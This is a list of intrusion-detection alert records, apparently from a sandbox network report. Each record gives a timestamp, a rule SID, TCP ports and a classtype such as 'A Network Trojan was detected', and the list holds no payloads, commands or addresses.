                      Timestamp:07/20/24-23:05:46.459249
                      SID:2025132
                      Source Port:39526
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.204539
                      SID:2831300
                      Source Port:35544
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:03.476247
                      SID:2829579
                      Source Port:50990
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.409925
                      SID:2027339
                      Source Port:56914
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.093469
                      SID:2831300
                      Source Port:38474
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:35.309569
                      SID:2027339
                      Source Port:44848
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:15.027910
                      SID:2027339
                      Source Port:35966
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.078777
                      SID:2835222
                      Source Port:57368
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.313345
                      SID:2027339
                      Source Port:44510
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.376608
                      SID:2835222
                      Source Port:36624
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.465013
                      SID:2831300
                      Source Port:50678
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:46.516600
                      SID:2025132
                      Source Port:52740
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.478181
                      SID:2025132
                      Source Port:46448
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.324397
                      SID:2835222
                      Source Port:46706
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.632555
                      SID:2831300
                      Source Port:52040
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:44.327630
                      SID:2027339
                      Source Port:57426
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.801547
                      SID:2829579
                      Source Port:40612
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.323611
                      SID:2835222
                      Source Port:42424
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.998513
                      SID:2025132
                      Source Port:34092
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:11.138961
                      SID:2831300
                      Source Port:49594
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:15.408714
                      SID:2027339
                      Source Port:35922
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.896425
                      SID:2027339
                      Source Port:45322
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.193739
                      SID:2027339
                      Source Port:54484
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.557712
                      SID:2027339
                      Source Port:46826
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.859779
                      SID:2835222
                      Source Port:44846
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.458812
                      SID:2027339
                      Source Port:58370
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:04.023969
                      SID:2025132
                      Source Port:48544
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.413993
                      SID:2025132
                      Source Port:33460
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.347403
                      SID:2831300
                      Source Port:35066
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:06.896657
                      SID:2831300
                      Source Port:46408
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.778623
                      SID:2025132
                      Source Port:50610
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:17.699827
                      SID:2027339
                      Source Port:60816
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:38.250934
                      SID:2831300
                      Source Port:50794
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.507639
                      SID:2831300
                      Source Port:38724
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:45.403074
                      SID:2829579
                      Source Port:40972
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.085193
                      SID:2835222
                      Source Port:57722
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.501247
                      SID:2835222
                      Source Port:37220
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.589392
                      SID:2027339
                      Source Port:41302
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.459661
                      SID:2027339
                      Source Port:48112
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.659617
                      SID:2835222
                      Source Port:46100
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.653253
                      SID:2835222
                      Source Port:41262
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:14.554681
                      SID:2027339
                      Source Port:52990
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.821008
                      SID:2835222
                      Source Port:49548
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:46.064783
                      SID:2027339
                      Source Port:54136
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:11.425707
                      SID:2831300
                      Source Port:34836
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.374852
                      SID:2027339
                      Source Port:42820
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.853184
                      SID:2835222
                      Source Port:56228
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.449942
                      SID:2027339
                      Source Port:60872
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.094268
                      SID:2027339
                      Source Port:47022
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:35.309569
                      SID:2831300
                      Source Port:60756
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:12.623995
                      SID:2025132
                      Source Port:53320
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:02.392607
                      SID:2025132
                      Source Port:53422
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.440953
                      SID:2027339
                      Source Port:46872
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.571555
                      SID:2835222
                      Source Port:33358
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.592016
                      SID:2831300
                      Source Port:56168
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:02.251198
                      SID:2027339
                      Source Port:40012
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.925407
                      SID:2025132
                      Source Port:44402
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:02.429547
                      SID:2027339
                      Source Port:53434
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:16.347950
                      SID:2831300
                      Source Port:55846
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.333908
                      SID:2025132
                      Source Port:53114
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.697720
                      SID:2831300
                      Source Port:37090
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.995248
                      SID:2027339
                      Source Port:38200
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.853184
                      SID:2829579
                      Source Port:46428
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:43.392497
                      SID:2027339
                      Source Port:40646
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.861088
                      SID:2835222
                      Source Port:46190
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.540433
                      SID:2027339
                      Source Port:57800
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.607039
                      SID:2831300
                      Source Port:48702
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:00.558004
                      SID:2025132
                      Source Port:58274
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.788274
                      SID:2835222
                      Source Port:48984
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.467316
                      SID:2027339
                      Source Port:39930
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.220682
                      SID:2829579
                      Source Port:46988
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.260147
                      SID:2831300
                      Source Port:50864
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:00.247273
                      SID:2027339
                      Source Port:42384
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.531304
                      SID:2027339
                      Source Port:52072
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.512016
                      SID:2027339
                      Source Port:39508
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.522257
                      SID:2829579
                      Source Port:38748
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.954678
                      SID:2027339
                      Source Port:47526
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.640698
                      SID:2027339
                      Source Port:48520
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.143971
                      SID:2027339
                      Source Port:60852
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.091054
                      SID:2831300
                      Source Port:38710
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:50.513568
                      SID:2835222
                      Source Port:38652
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.245949
                      SID:2835222
                      Source Port:49418
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:15.435068
                      SID:2027339
                      Source Port:34120
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.527690
                      SID:2027339
                      Source Port:43606
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.344189
                      SID:2831300
                      Source Port:58436
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:56.310476
                      SID:2829579
                      Source Port:51076
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.143129
                      SID:2027339
                      Source Port:54360
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.452056
                      SID:2831300
                      Source Port:45688
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:45.389146
                      SID:2829579
                      Source Port:51156
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.280490
                      SID:2025132
                      Source Port:41840
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.183114
                      SID:2027339
                      Source Port:38640
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.961036
                      SID:2027339
                      Source Port:60430
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.290948
                      SID:2027339
                      Source Port:35632
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.056805
                      SID:2027339
                      Source Port:33552
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.114628
                      SID:2027339
                      Source Port:33972
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.047547
                      SID:2829579
                      Source Port:45748
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:32.045227
                      SID:2030490
                      Source Port:37550
                      Destination Port:2466
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.830570
                      SID:2835222
                      Source Port:46850
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:38.097414
                      SID:2829579
                      Source Port:52194
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:06.283235
                      SID:2025132
                      Source Port:58646
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.200464
                      SID:2025132
                      Source Port:54646
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.260797
                      SID:2025132
                      Source Port:55878
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.339812
                      SID:2027339
                      Source Port:34980
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.171385
                      SID:2027339
                      Source Port:34648
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.753312
                      SID:2025132
                      Source Port:40136
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.430184
                      SID:2829579
                      Source Port:37022
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.486123
                      SID:2831300
                      Source Port:59964
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.344189
                      SID:2831300
                      Source Port:50530
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:42.256029
                      SID:2835222
                      Source Port:52152
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.797060
                      SID:2025132
                      Source Port:40118
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.087911
                      SID:2027339
                      Source Port:40914
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.055908
                      SID:2829579
                      Source Port:52822
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.414465
                      SID:2835222
                      Source Port:35132
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.537576
                      SID:2829579
                      Source Port:50690
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.595920
                      SID:2835222
                      Source Port:44070
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:06.186329
                      SID:2027339
                      Source Port:33186
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.177522
                      SID:2831300
                      Source Port:60230
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.260147
                      SID:2025132
                      Source Port:56942
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:11.426541
                      SID:2025132
                      Source Port:59544
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:09.610263
                      SID:2027339
                      Source Port:42022
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.732603
                      SID:2025132
                      Source Port:56358
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.264109
                      SID:2027339
                      Source Port:49012
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:15.338809
                      SID:2027339
                      Source Port:32858
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.414465
                      SID:2829579
                      Source Port:48832
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.468009
                      SID:2835222
                      Source Port:43694
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:08.228937
                      SID:2027339
                      Source Port:44094
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:12.532321
                      SID:2027339
                      Source Port:38148
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:31.001861
                      SID:2025132
                      Source Port:34224
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.361374
                      SID:2027339
                      Source Port:43232
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:12.244446
                      SID:2027339
                      Source Port:47086
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.557201
                      SID:2835222
                      Source Port:59788
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:06.736138
                      SID:2025132
                      Source Port:41722
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.997517
                      SID:2025132
                      Source Port:56314
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.328640
                      SID:2829579
                      Source Port:37160
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.418921
                      SID:2027339
                      Source Port:56282
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.531088
                      SID:2027339
                      Source Port:42938
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.170266
                      SID:2027339
                      Source Port:60928
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.867960
                      SID:2027339
                      Source Port:44534
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.677506
                      SID:2829579
                      Source Port:51824
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:24.267901
                      SID:2027339
                      Source Port:40716
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.943061
                      SID:2027339
                      Source Port:47224
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.801547
                      SID:2829579
                      Source Port:41540
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.555898
                      SID:2829579
                      Source Port:59208
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.559359
                      SID:2829579
                      Source Port:54432
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.793562
                      SID:2025132
                      Source Port:54248
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.998513
                      SID:2025132
                      Source Port:55584
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.170267
                      SID:2027339
                      Source Port:43530
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.325934
                      SID:2831300
                      Source Port:34694
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.106017
                      SID:2027339
                      Source Port:60198
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.118554
                      SID:2027339
                      Source Port:58398
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:17.076848
                      SID:2027339
                      Source Port:59530
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.994181
                      SID:2027339
                      Source Port:49968
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.516035
                      SID:2831300
                      Source Port:56180
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:05.309801
                      SID:2027339
                      Source Port:36450
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.017303
                      SID:2027339
                      Source Port:55684
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.857328
                      SID:2835222
                      Source Port:37766
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.863090
                      SID:2829579
                      Source Port:55596
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.399812
                      SID:2831300
                      Source Port:55694
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:07:03.123324
                      SID:2027339
                      Source Port:53566
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.514709
                      SID:2027339
                      Source Port:55474
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.951134
                      SID:2835222
                      Source Port:40848
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.488878
                      SID:2831300
                      Source Port:57010
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.365973
                      SID:2027339
                      Source Port:34578
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:17.447614
                      SID:2025132
                      Source Port:42306
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.361541
                      SID:2831300
                      Source Port:45714
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.134757
                      SID:2027339
                      Source Port:57126
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.426493
                      SID:2831300
                      Source Port:46616
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:45.435097
                      SID:2829579
                      Source Port:41354
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.236975
                      SID:2027339
                      Source Port:57348
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:11.477052
                      SID:2025132
                      Source Port:41058
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:14.686896
                      SID:2027339
                      Source Port:46434
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.493434
                      SID:2831300
                      Source Port:53212
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.180627
                      SID:2025132
                      Source Port:48506
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.625834
                      SID:2027339
                      Source Port:36344
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.036527
                      SID:2829579
                      Source Port:52264
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.045965
                      SID:2831300
                      Source Port:43754
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:33.829338
                      SID:2835222
                      Source Port:42050
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.717242
                      SID:2027339
                      Source Port:53836
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.303078
                      SID:2831300
                      Source Port:55776
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:39.092497
                      SID:2027339
                      Source Port:42370
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.044038
